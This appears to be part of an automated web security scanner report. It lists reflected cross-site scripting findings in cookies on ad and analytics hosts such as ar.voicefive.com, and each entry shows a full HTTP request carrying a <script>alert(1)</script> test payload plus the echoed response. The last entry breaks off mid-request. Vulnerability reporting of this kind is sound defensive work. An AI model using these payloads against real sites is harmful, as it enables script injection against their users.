Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /bmx3/broker.pli?pid=p82806590&PRAd=62874418&AR_C=40422013 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/N1260.cnetzdnet/B5448313.5;sz=300x250;pc=cbs513717;click0=http://adlog.com.com/adlog/e/r=8041&sg=513717&o=6037%253A13616%253A&h=cn&p=&b=2&l=&site=2&pt=2100&nd=13616&pid=&cid=207595&pp=100&e=&rqid=01c13-ad-e6:4DCB63ED638330&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=J-kzEAoPOk4AAFIsDHEAAABP&t=2011.05.12.13.27.52&event=58/;ord=2011.05.12.13.27.52?
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p91300630=exp=1&initExp=Thu Apr 21 01:24:06 2011&recExp=Thu Apr 21 01:24:06 2011&prad=1201632&arc=1442826&; ar_p90175839=exp=3&initExp=Sun Apr 24 15:20:22 2011&recExp=Sun Apr 24 15:20:23 2011&prad=3992125865291151&arc=6108747&; ar_p81479006=exp=1&initExp=Sun Apr 24 19:44:30 2011&recExp=Sun Apr 24 19:44:30 2011&prad=58779362&arc=40314462&; ar_s_p81479006=1; ar_p91136705=exp=2&initExp=Tue Apr 26 18:40:08 2011&recExp=Wed Apr 27 12:40:09 2011&prad=296638419&arc=206710287&; ar_p92429851=exp=4&initExp=Tue Apr 26 18:36:13 2011&recExp=Wed Apr 27 12:40:21 2011&prad=296638425&arc=200912704&; ar_p84552060=exp=1&initExp=Wed Apr 27 19:31:14 2011&recExp=Wed Apr 27 19:31:14 2011&prad=2108505&arc=4477116&; ar_p90452457=exp=1&initExp=Thu May 5 00:58:23 2011&recExp=Thu May 5 00:58:23 2011&prad=310177527&arc=211671722&c3519<script>alert(1)</script>d44fa25d073; ar_p85001580=exp=1&initExp=Tue May 10 13:28:54 2011&recExp=Tue May 10 13:28:54 2011&prad=62165328&arc=41861280&; ar_p82806590=exp=2&initExp=Thu Apr 28 21:29:14 2011&recExp=Tue May 10 18:23:11 2011&prad=58779362&arc=41840773&; ar_p97174789=exp=50&initExp=Sun Apr 24 12:09:48 2011&recExp=Wed May 11 15:02:57 2011&prad=253732016&arc=194941096&; UID=875e3f1e-184.84.247.65-1303349046

Response

HTTP/1.1 200 OK
Server: nginx
Date: Thu, 12 May 2011 13:28:26 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: ar_p82806590=exp=3&initExp=Thu Apr 28 21:29:14 2011&recExp=Thu May 12 13:28:26 2011&prad=62874418&arc=40422013&; expires=Wed 10-Aug-2011 13:28:26 GMT; path=/; domain=.voicefive.com;
Set-Cookie: BMX_G=method->-1,ts->1305206906; path=/; domain=.voicefive.com;
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 25878

if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Broker)!="undefined"){COMSCORE.BMX.Broker.logCensus({Prad:"62874418",Pid:"p82806590",Arc:"40422013",Location:CO
...[SNIP]...
Exp=Tue May 10 18:23:11 2011&prad=58779362&arc=41840773&', "ar_s_p81479006": '1', "ar_p90452457": 'exp=1&initExp=Thu May 5 00:58:23 2011&recExp=Thu May 5 00:58:23 2011&prad=310177527&arc=211671722&c3519<script>alert(1)</script>d44fa25d073', "ar_p84552060": 'exp=1&initExp=Wed Apr 27 19:31:14 2011&recExp=Wed Apr 27 19:31:14 2011&prad=2108505&arc=4477116&', "ar_p90175839": 'exp=3&initExp=Sun Apr 24 15:20:22 2011&recExp=Sun Apr 24 15:20:
...[SNIP]...
2.147. http://ar.voicefive.com/bmx3/broker.pli [ar_p91136705 cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /bmx3/broker.pli

Issue detail

The value of the ar_p91136705 cookie is copied into the HTML document as plain text between tags. The payload 51f3f<script>alert(1)</script>d388c365221 was submitted in the ar_p91136705 cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /bmx3/broker.pli?pid=p82806590&PRAd=62874418&AR_C=40422013 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/N1260.cnetzdnet/B5448313.5;sz=300x250;pc=cbs513717;click0=http://adlog.com.com/adlog/e/r=8041&sg=513717&o=6037%253A13616%253A&h=cn&p=&b=2&l=&site=2&pt=2100&nd=13616&pid=&cid=207595&pp=100&e=&rqid=01c13-ad-e6:4DCB63ED638330&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=J-kzEAoPOk4AAFIsDHEAAABP&t=2011.05.12.13.27.52&event=58/;ord=2011.05.12.13.27.52?
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p91300630=exp=1&initExp=Thu Apr 21 01:24:06 2011&recExp=Thu Apr 21 01:24:06 2011&prad=1201632&arc=1442826&; ar_p90175839=exp=3&initExp=Sun Apr 24 15:20:22 2011&recExp=Sun Apr 24 15:20:23 2011&prad=3992125865291151&arc=6108747&; ar_p81479006=exp=1&initExp=Sun Apr 24 19:44:30 2011&recExp=Sun Apr 24 19:44:30 2011&prad=58779362&arc=40314462&; ar_s_p81479006=1; ar_p91136705=exp=2&initExp=Tue Apr 26 18:40:08 2011&recExp=Wed Apr 27 12:40:09 2011&prad=296638419&arc=206710287&51f3f<script>alert(1)</script>d388c365221; ar_p92429851=exp=4&initExp=Tue Apr 26 18:36:13 2011&recExp=Wed Apr 27 12:40:21 2011&prad=296638425&arc=200912704&; ar_p84552060=exp=1&initExp=Wed Apr 27 19:31:14 2011&recExp=Wed Apr 27 19:31:14 2011&prad=2108505&arc=4477116&; ar_p90452457=exp=1&initExp=Thu May 5 00:58:23 2011&recExp=Thu May 5 00:58:23 2011&prad=310177527&arc=211671722&; ar_p85001580=exp=1&initExp=Tue May 10 13:28:54 2011&recExp=Tue May 10 13:28:54 2011&prad=62165328&arc=41861280&; ar_p82806590=exp=2&initExp=Thu Apr 28 21:29:14 2011&recExp=Tue May 10 18:23:11 2011&prad=58779362&arc=41840773&; ar_p97174789=exp=50&initExp=Sun Apr 24 12:09:48 2011&recExp=Wed May 11 15:02:57 2011&prad=253732016&arc=194941096&; UID=875e3f1e-184.84.247.65-1303349046

Response

HTTP/1.1 200 OK
Server: nginx
Date: Thu, 12 May 2011 13:28:18 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: ar_p82806590=exp=3&initExp=Thu Apr 28 21:29:14 2011&recExp=Thu May 12 13:28:18 2011&prad=62874418&arc=40422013&; expires=Wed 10-Aug-2011 13:28:18 GMT; path=/; domain=.voicefive.com;
Set-Cookie: BMX_G=method->-1,ts->1305206898; path=/; domain=.voicefive.com;
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 25878

if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Broker)!="undefined"){COMSCORE.BMX.Broker.logCensus({Prad:"62874418",Pid:"p82806590",Arc:"40422013",Location:CO
...[SNIP]...
&prad=3992125865291151&arc=6108747&', "UID": '875e3f1e-184.84.247.65-1303349046', "ar_p91136705": 'exp=2&initExp=Tue Apr 26 18:40:08 2011&recExp=Wed Apr 27 12:40:09 2011&prad=296638419&arc=206710287&51f3f<script>alert(1)</script>d388c365221', "ar_p85001580": 'exp=1&initExp=Tue May 10 13:28:54 2011&recExp=Tue May 10 13:28:54 2011&prad=62165328&arc=41861280&', "ar_p92429851": 'exp=4&initExp=Tue Apr 26 18:36:13 2011&recExp=Wed Apr 27 12:4
...[SNIP]...
2.148. http://ar.voicefive.com/bmx3/broker.pli [ar_p91300630 cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /bmx3/broker.pli

Issue detail

The value of the ar_p91300630 cookie is copied into the HTML document as plain text between tags. The payload b2d2d<script>alert(1)</script>a8f3cf0f359 was submitted in the ar_p91300630 cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /bmx3/broker.pli?pid=p82806590&PRAd=62874418&AR_C=40422013 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/N1260.cnetzdnet/B5448313.5;sz=300x250;pc=cbs513717;click0=http://adlog.com.com/adlog/e/r=8041&sg=513717&o=6037%253A13616%253A&h=cn&p=&b=2&l=&site=2&pt=2100&nd=13616&pid=&cid=207595&pp=100&e=&rqid=01c13-ad-e6:4DCB63ED638330&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=J-kzEAoPOk4AAFIsDHEAAABP&t=2011.05.12.13.27.52&event=58/;ord=2011.05.12.13.27.52?
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p91300630=exp=1&initExp=Thu Apr 21 01:24:06 2011&recExp=Thu Apr 21 01:24:06 2011&prad=1201632&arc=1442826&b2d2d<script>alert(1)</script>a8f3cf0f359; ar_p90175839=exp=3&initExp=Sun Apr 24 15:20:22 2011&recExp=Sun Apr 24 15:20:23 2011&prad=3992125865291151&arc=6108747&; ar_p81479006=exp=1&initExp=Sun Apr 24 19:44:30 2011&recExp=Sun Apr 24 19:44:30 2011&prad=58779362&arc=40314462&; ar_s_p81479006=1; ar_p91136705=exp=2&initExp=Tue Apr 26 18:40:08 2011&recExp=Wed Apr 27 12:40:09 2011&prad=296638419&arc=206710287&; ar_p92429851=exp=4&initExp=Tue Apr 26 18:36:13 2011&recExp=Wed Apr 27 12:40:21 2011&prad=296638425&arc=200912704&; ar_p84552060=exp=1&initExp=Wed Apr 27 19:31:14 2011&recExp=Wed Apr 27 19:31:14 2011&prad=2108505&arc=4477116&; ar_p90452457=exp=1&initExp=Thu May 5 00:58:23 2011&recExp=Thu May 5 00:58:23 2011&prad=310177527&arc=211671722&; ar_p85001580=exp=1&initExp=Tue May 10 13:28:54 2011&recExp=Tue May 10 13:28:54 2011&prad=62165328&arc=41861280&; ar_p82806590=exp=2&initExp=Thu Apr 28 21:29:14 2011&recExp=Tue May 10 18:23:11 2011&prad=58779362&arc=41840773&; ar_p97174789=exp=50&initExp=Sun Apr 24 12:09:48 2011&recExp=Wed May 11 15:02:57 2011&prad=253732016&arc=194941096&; UID=875e3f1e-184.84.247.65-1303349046

Response

HTTP/1.1 200 OK
Server: nginx
Date: Thu, 12 May 2011 13:28:17 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: ar_p82806590=exp=3&initExp=Thu Apr 28 21:29:14 2011&recExp=Thu May 12 13:28:17 2011&prad=62874418&arc=40422013&; expires=Wed 10-Aug-2011 13:28:17 GMT; path=/; domain=.voicefive.com;
Set-Cookie: BMX_G=method->-1,ts->1305206897; path=/; domain=.voicefive.com;
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 25878

if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Broker)!="undefined"){COMSCORE.BMX.Broker.logCensus({Prad:"62874418",Pid:"p82806590",Arc:"40422013",Location:CO
...[SNIP]...
Sun Apr 24 19:44:30 2011&recExp=Sun Apr 24 19:44:30 2011&prad=58779362&arc=40314462&', "ar_p91300630": 'exp=1&initExp=Thu Apr 21 01:24:06 2011&recExp=Thu Apr 21 01:24:06 2011&prad=1201632&arc=1442826&b2d2d<script>alert(1)</script>a8f3cf0f359' };
COMSCORE.BMX.Broker.GlobalConfig={
"urlExcludeList": "http://photobucket.com/$|zone.msn.com|xbox.com|www.aol.com/$|http://Webmail.aol.com/$|http://travel.aol.com/$|http://netscape.aol.com/$|http
...[SNIP]...
2.149. http://ar.voicefive.com/bmx3/broker.pli [ar_p92429851 cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /bmx3/broker.pli

Issue detail

The value of the ar_p92429851 cookie is copied into the HTML document as plain text between tags. The payload 2e933<script>alert(1)</script>2db6105bb74 was submitted in the ar_p92429851 cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /bmx3/broker.pli?pid=p82806590&PRAd=62874418&AR_C=40422013 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/N1260.cnetzdnet/B5448313.5;sz=300x250;pc=cbs513717;click0=http://adlog.com.com/adlog/e/r=8041&sg=513717&o=6037%253A13616%253A&h=cn&p=&b=2&l=&site=2&pt=2100&nd=13616&pid=&cid=207595&pp=100&e=&rqid=01c13-ad-e6:4DCB63ED638330&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=J-kzEAoPOk4AAFIsDHEAAABP&t=2011.05.12.13.27.52&event=58/;ord=2011.05.12.13.27.52?
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p91300630=exp=1&initExp=Thu Apr 21 01:24:06 2011&recExp=Thu Apr 21 01:24:06 2011&prad=1201632&arc=1442826&; ar_p90175839=exp=3&initExp=Sun Apr 24 15:20:22 2011&recExp=Sun Apr 24 15:20:23 2011&prad=3992125865291151&arc=6108747&; ar_p81479006=exp=1&initExp=Sun Apr 24 19:44:30 2011&recExp=Sun Apr 24 19:44:30 2011&prad=58779362&arc=40314462&; ar_s_p81479006=1; ar_p91136705=exp=2&initExp=Tue Apr 26 18:40:08 2011&recExp=Wed Apr 27 12:40:09 2011&prad=296638419&arc=206710287&; ar_p92429851=exp=4&initExp=Tue Apr 26 18:36:13 2011&recExp=Wed Apr 27 12:40:21 2011&prad=296638425&arc=200912704&2e933<script>alert(1)</script>2db6105bb74; ar_p84552060=exp=1&initExp=Wed Apr 27 19:31:14 2011&recExp=Wed Apr 27 19:31:14 2011&prad=2108505&arc=4477116&; ar_p90452457=exp=1&initExp=Thu May 5 00:58:23 2011&recExp=Thu May 5 00:58:23 2011&prad=310177527&arc=211671722&; ar_p85001580=exp=1&initExp=Tue May 10 13:28:54 2011&recExp=Tue May 10 13:28:54 2011&prad=62165328&arc=41861280&; ar_p82806590=exp=2&initExp=Thu Apr 28 21:29:14 2011&recExp=Tue May 10 18:23:11 2011&prad=58779362&arc=41840773&; ar_p97174789=exp=50&initExp=Sun Apr 24 12:09:48 2011&recExp=Wed May 11 15:02:57 2011&prad=253732016&arc=194941096&; UID=875e3f1e-184.84.247.65-1303349046

Response

HTTP/1.1 200 OK
Server: nginx
Date: Thu, 12 May 2011 13:28:18 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: ar_p82806590=exp=3&initExp=Thu Apr 28 21:29:14 2011&recExp=Thu May 12 13:28:18 2011&prad=62874418&arc=40422013&; expires=Wed 10-Aug-2011 13:28:18 GMT; path=/; domain=.voicefive.com;
Set-Cookie: BMX_G=method->-1,ts->1305206898; path=/; domain=.voicefive.com;
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 25878

if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Broker)!="undefined"){COMSCORE.BMX.Broker.logCensus({Prad:"62874418",Pid:"p82806590",Arc:"40422013",Location:CO
...[SNIP]...
Apr 28 21:29:14 2011&recExp=Tue May 10 18:23:11 2011&prad=58779362&arc=41840773&', "ar_p92429851": 'exp=4&initExp=Tue Apr 26 18:36:13 2011&recExp=Wed Apr 27 12:40:21 2011&prad=296638425&arc=200912704&2e933<script>alert(1)</script>2db6105bb74', "ar_p81479006": 'exp=1&initExp=Sun Apr 24 19:44:30 2011&recExp=Sun Apr 24 19:44:30 2011&prad=58779362&arc=40314462&', "ar_s_p81479006": '1', "ar_p91300630": 'exp=1&initExp=Thu Apr 21 01:24:06 201
...[SNIP]...
2.150. http://ar.voicefive.com/bmx3/broker.pli [ar_p97174789 cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /bmx3/broker.pli

Issue detail

The value of the ar_p97174789 cookie is copied into the HTML document as plain text between tags. The payload b3895<script>alert(1)</script>0953d20e172 was submitted in the ar_p97174789 cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /bmx3/broker.pli?pid=p82806590&PRAd=62874418&AR_C=40422013 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/N1260.cnetzdnet/B5448313.5;sz=300x250;pc=cbs513717;click0=http://adlog.com.com/adlog/e/r=8041&sg=513717&o=6037%253A13616%253A&h=cn&p=&b=2&l=&site=2&pt=2100&nd=13616&pid=&cid=207595&pp=100&e=&rqid=01c13-ad-e6:4DCB63ED638330&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=J-kzEAoPOk4AAFIsDHEAAABP&t=2011.05.12.13.27.52&event=58/;ord=2011.05.12.13.27.52?
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p91300630=exp=1&initExp=Thu Apr 21 01:24:06 2011&recExp=Thu Apr 21 01:24:06 2011&prad=1201632&arc=1442826&; ar_p90175839=exp=3&initExp=Sun Apr 24 15:20:22 2011&recExp=Sun Apr 24 15:20:23 2011&prad=3992125865291151&arc=6108747&; ar_p81479006=exp=1&initExp=Sun Apr 24 19:44:30 2011&recExp=Sun Apr 24 19:44:30 2011&prad=58779362&arc=40314462&; ar_s_p81479006=1; ar_p91136705=exp=2&initExp=Tue Apr 26 18:40:08 2011&recExp=Wed Apr 27 12:40:09 2011&prad=296638419&arc=206710287&; ar_p92429851=exp=4&initExp=Tue Apr 26 18:36:13 2011&recExp=Wed Apr 27 12:40:21 2011&prad=296638425&arc=200912704&; ar_p84552060=exp=1&initExp=Wed Apr 27 19:31:14 2011&recExp=Wed Apr 27 19:31:14 2011&prad=2108505&arc=4477116&; ar_p90452457=exp=1&initExp=Thu May 5 00:58:23 2011&recExp=Thu May 5 00:58:23 2011&prad=310177527&arc=211671722&; ar_p85001580=exp=1&initExp=Tue May 10 13:28:54 2011&recExp=Tue May 10 13:28:54 2011&prad=62165328&arc=41861280&; ar_p82806590=exp=2&initExp=Thu Apr 28 21:29:14 2011&recExp=Tue May 10 18:23:11 2011&prad=58779362&arc=41840773&; ar_p97174789=exp=50&initExp=Sun Apr 24 12:09:48 2011&recExp=Wed May 11 15:02:57 2011&prad=253732016&arc=194941096&b3895<script>alert(1)</script>0953d20e172; UID=875e3f1e-184.84.247.65-1303349046

Response

HTTP/1.1 200 OK
Server: nginx
Date: Thu, 12 May 2011 13:28:27 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: ar_p82806590=exp=3&initExp=Thu Apr 28 21:29:14 2011&recExp=Thu May 12 13:28:27 2011&prad=62874418&arc=40422013&; expires=Wed 10-Aug-2011 13:28:27 GMT; path=/; domain=.voicefive.com;
Set-Cookie: BMX_G=method->-1,ts->1305206907; path=/; domain=.voicefive.com;
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 25878

if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Broker)!="undefined"){COMSCORE.BMX.Broker.logCensus({Prad:"62874418",Pid:"p82806590",Arc:"40422013",Location:CO
...[SNIP]...
onload);
}}}}}},f:[],done:false,timer:null};})();}COMSCORE.BMX.Broker.Cookies={ "ar_p97174789": 'exp=50&initExp=Sun Apr 24 12:09:48 2011&recExp=Wed May 11 15:02:57 2011&prad=253732016&arc=194941096&b3895<script>alert(1)</script>0953d20e172', "ar_p82806590": 'exp=2&initExp=Thu Apr 28 21:29:14 2011&recExp=Tue May 10 18:23:11 2011&prad=58779362&arc=41840773&', "ar_s_p81479006": '1', "ar_p90452457": 'exp=1&initExp=Thu May 5 00:58:23 201
...[SNIP]...
2.151. http://ar.voicefive.com/bmx3/broker.pli [ar_s_p81479006 cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /bmx3/broker.pli

Issue detail

The value of the ar_s_p81479006 cookie is copied into the HTML document as plain text between tags. The payload f9d07<script>alert(1)</script>23cddd478e was submitted in the ar_s_p81479006 cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /bmx3/broker.pli?pid=p82806590&PRAd=62874418&AR_C=40422013 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/N1260.cnetzdnet/B5448313.5;sz=300x250;pc=cbs513717;click0=http://adlog.com.com/adlog/e/r=8041&sg=513717&o=6037%253A13616%253A&h=cn&p=&b=2&l=&site=2&pt=2100&nd=13616&pid=&cid=207595&pp=100&e=&rqid=01c13-ad-e6:4DCB63ED638330&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=J-kzEAoPOk4AAFIsDHEAAABP&t=2011.05.12.13.27.52&event=58/;ord=2011.05.12.13.27.52?
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p91300630=exp=1&initExp=Thu Apr 21 01:24:06 2011&recExp=Thu Apr 21 01:24:06 2011&prad=1201632&arc=1442826&; ar_p90175839=exp=3&initExp=Sun Apr 24 15:20:22 2011&recExp=Sun Apr 24 15:20:23 2011&prad=3992125865291151&arc=6108747&; ar_p81479006=exp=1&initExp=Sun Apr 24 19:44:30 2011&recExp=Sun Apr 24 19:44:30 2011&prad=58779362&arc=40314462&; ar_s_p81479006=1f9d07<script>alert(1)</script>23cddd478e; ar_p91136705=exp=2&initExp=Tue Apr 26 18:40:08 2011&recExp=Wed Apr 27 12:40:09 2011&prad=296638419&arc=206710287&; ar_p92429851=exp=4&initExp=Tue Apr 26 18:36:13 2011&recExp=Wed Apr 27 12:40:21 2011&prad=296638425&arc=200912704&; ar_p84552060=exp=1&initExp=Wed Apr 27 19:31:14 2011&recExp=Wed Apr 27 19:31:14 2011&prad=2108505&arc=4477116&; ar_p90452457=exp=1&initExp=Thu May 5 00:58:23 2011&recExp=Thu May 5 00:58:23 2011&prad=310177527&arc=211671722&; ar_p85001580=exp=1&initExp=Tue May 10 13:28:54 2011&recExp=Tue May 10 13:28:54 2011&prad=62165328&arc=41861280&; ar_p82806590=exp=2&initExp=Thu Apr 28 21:29:14 2011&recExp=Tue May 10 18:23:11 2011&prad=58779362&arc=41840773&; ar_p97174789=exp=50&initExp=Sun Apr 24 12:09:48 2011&recExp=Wed May 11 15:02:57 2011&prad=253732016&arc=194941096&; UID=875e3f1e-184.84.247.65-1303349046

Response

HTTP/1.1 200 OK
Server: nginx
Date: Thu, 12 May 2011 13:28:18 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: ar_p82806590=exp=3&initExp=Thu Apr 28 21:29:14 2011&recExp=Thu May 12 13:28:18 2011&prad=62874418&arc=40422013&; expires=Wed 10-Aug-2011 13:28:18 GMT; path=/; domain=.voicefive.com;
Set-Cookie: BMX_G=method->-1,ts->1305206898; path=/; domain=.voicefive.com;
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 25877

if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Broker)!="undefined"){COMSCORE.BMX.Broker.logCensus({Prad:"62874418",Pid:"p82806590",Arc:"40422013",Location:CO
...[SNIP]...
Exp=Wed May 11 15:02:57 2011&prad=253732016&arc=194941096&', "ar_p82806590": 'exp=2&initExp=Thu Apr 28 21:29:14 2011&recExp=Tue May 10 18:23:11 2011&prad=58779362&arc=41840773&', "ar_s_p81479006": '1f9d07<script>alert(1)</script>23cddd478e', "ar_p90452457": 'exp=1&initExp=Thu May 5 00:58:23 2011&recExp=Thu May 5 00:58:23 2011&prad=310177527&arc=211671722&', "ar_p84552060": 'exp=1&initExp=Wed Apr 27 19:31:14 2011&recExp=Wed Apr 27 19
...[SNIP]...
2.152. http://hits.nextstat.com/scripts/wsb.php [webStat_108645 cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://hits.nextstat.com
Path:   /scripts/wsb.php

Issue detail

The value of the webStat_108645 cookie is copied into the HTML document as plain text between tags. The payload de83d<script>alert(1)</script>25380d542c7 was submitted in the webStat_108645 cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /scripts/wsb.php?WSc=yes&WSpn=&WSref=&pg=28925&ac=108645&w=1920&h=1200&c=16&js=1.6&WSvp=http%3A//orangeorb.blogspot.com/2011/05/planets-align-on-friday-13th-and.html&tz=300&ls=&cam=undefined&evt=undefined HTTP/1.1
